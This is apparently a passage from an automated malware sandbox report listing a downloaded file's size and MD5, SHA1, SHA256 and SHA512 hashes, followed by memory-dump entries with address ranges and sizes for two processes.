                              aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                            • C:\Users\Admin\Downloads\Unconfirmed 253152.crdownload

                              Filesize

                              21.5MB

                              MD5

                              ac9526ec75362b14410cf9a29806eff4

                              SHA1

                              ef7c1b7181a9dc4e0a1c6b3804923b58500c263d

                              SHA256

                              5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164

                              SHA512

                              29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621

                            • memory/352-423-0x0000000000400000-0x0000000001DFD000-memory.dmp

                              Filesize

                              26.0MB

                            • memory/352-404-0x0000000000400000-0x0000000001DFD000-memory.dmp

                              Filesize

                              26.0MB

                            • memory/352-369-0x0000000000400000-0x0000000001DFD000-memory.dmp

                              Filesize

                              26.0MB

                            • memory/832-457-0x00007FFAFF340000-0x00007FFAFF351000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-488-0x00000215BF920000-0x00000215C09D0000-memory.dmp

                              Filesize

                              16.7MB

                            • memory/832-433-0x00007FF6511B0000-0x00007FF6512A8000-memory.dmp

                              Filesize

                              992KB

                            • memory/832-435-0x00007FFAF74F0000-0x00007FFAF77A6000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/832-443-0x00007FFAF6C30000-0x00007FFAF6E3B000-memory.dmp

                              Filesize

                              2.0MB

                            • memory/832-439-0x00007FFB00560000-0x00007FFB00577000-memory.dmp

                              Filesize

                              92KB

                            • memory/832-438-0x00007FFB03E50000-0x00007FFB03E61000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-437-0x00007FFB05030000-0x00007FFB05047000-memory.dmp

                              Filesize

                              92KB

                            • memory/832-436-0x00007FFB09860000-0x00007FFB09878000-memory.dmp

                              Filesize

                              96KB

                            • memory/832-442-0x00007FFB00500000-0x00007FFB00511000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-441-0x00007FFB00520000-0x00007FFB0053D000-memory.dmp

                              Filesize

                              116KB

                            • memory/832-458-0x00007FFAF7B40000-0x00007FFAF7B97000-memory.dmp

                              Filesize

                              348KB

                            • memory/832-440-0x00007FFB00540000-0x00007FFB00551000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-434-0x00007FFB03640000-0x00007FFB03674000-memory.dmp

                              Filesize

                              208KB

                            • memory/832-449-0x00007FFB00100000-0x00007FFB00111000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-444-0x00000215BF920000-0x00000215C09D0000-memory.dmp

                              Filesize

                              16.7MB

                            • memory/832-454-0x00007FFAFC620000-0x00007FFAFC650000-memory.dmp

                              Filesize

                              192KB

                            • memory/832-453-0x00007FFAFF390000-0x00007FFAFF3A8000-memory.dmp

                              Filesize

                              96KB

                            • memory/832-452-0x00007FFAFF3B0000-0x00007FFAFF3C1000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-451-0x00007FFAFF3D0000-0x00007FFAFF3EB000-memory.dmp

                              Filesize

                              108KB

                            • memory/832-450-0x00007FFAFF3F0000-0x00007FFAFF401000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-455-0x00007FFAFC2E0000-0x00007FFAFC347000-memory.dmp

                              Filesize

                              412KB

                            • memory/832-448-0x00007FFB00120000-0x00007FFB00131000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-447-0x00007FFB004E0000-0x00007FFB004F8000-memory.dmp

                              Filesize

                              96KB

                            • memory/832-446-0x00007FFB002A0000-0x00007FFB002C1000-memory.dmp

                              Filesize

                              132KB

                            • memory/832-445-0x00007FFAFF410000-0x00007FFAFF451000-memory.dmp

                              Filesize

                              260KB

                            • memory/832-456-0x00007FFAF8A10000-0x00007FFAF8A8C000-memory.dmp

                              Filesize

                              496KB